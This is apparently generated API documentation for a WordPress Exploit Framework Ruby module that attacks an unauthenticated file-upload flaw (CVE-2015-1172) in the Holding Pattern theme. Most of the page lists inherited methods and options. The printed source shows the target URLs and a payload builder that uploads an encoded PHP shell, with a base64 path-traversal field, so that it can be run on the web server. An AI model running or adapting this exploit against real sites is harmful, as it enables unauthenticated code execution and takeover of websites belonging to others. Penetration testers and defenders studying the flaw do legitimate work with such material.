Class: Wpxf::Exploit::HoldingPatternShellUpload
- Inherits:
-
SimplecartShellUpload
- Object
- Module
- SimplecartShellUpload
- Wpxf::Exploit::HoldingPatternShellUpload
- Includes:
- Wpxf
- Defined in:
- lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ HoldingPatternShellUpload
constructor
A new instance of HoldingPatternShellUpload.
- #payload_body_builder(payload_name) ⇒ Object
- #plugin_url ⇒ Object
- #uploader_url ⇒ Object
- #uploads_url ⇒ Object
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from SimplecartShellUpload
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ HoldingPatternShellUpload
Returns a new instance of HoldingPatternShellUpload.
8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 8 def initialize super update_info( name: 'Holding Pattern Theme Shell Upload', desc: 'This module exploits a file upload vulnerability in all versions '\ 'of the Holding Pattern theme found in the upload_file.php script '\ 'which contains no session or file validation. It allows '\ 'unauthenticated users to upload files of any type and '\ 'subsequently execute PHP scripts in the context of the '\ 'web server.', author: [ 'Alexander Borg', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2015-1172'], ['WPVDB', '7784'] ], date: 'Feb 11 2015' ) end |
Instance Method Details
#check ⇒ Object
31 32 33 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 31 def check check_theme_version_from_readme('holding_pattern') end |
#payload_body_builder(payload_name) ⇒ Object
47 48 49 50 51 52 53 54 55 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 47 def payload_body_builder(payload_name) target_ip = IPSocket.getaddress(target_host) field_name = Utility::Text.md5(target_ip) builder = Utility::BodyBuilder.new builder.add_file_from_string(field_name, payload.encoded, payload_name) builder.add_field('upload_path', 'Li4vdXBsb2Fkcw==') builder end |
#plugin_url ⇒ Object
35 36 37 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 35 def plugin_url normalize_uri(wordpress_url_themes, 'holding_pattern') end |
#uploader_url ⇒ Object
43 44 45 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 43 def uploader_url normalize_uri(plugin_url, 'admin', 'upload-file.php') end |
#uploads_url ⇒ Object
39 40 41 |
# File 'lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb', line 39 def uploads_url normalize_uri(plugin_url, 'uploads/') end |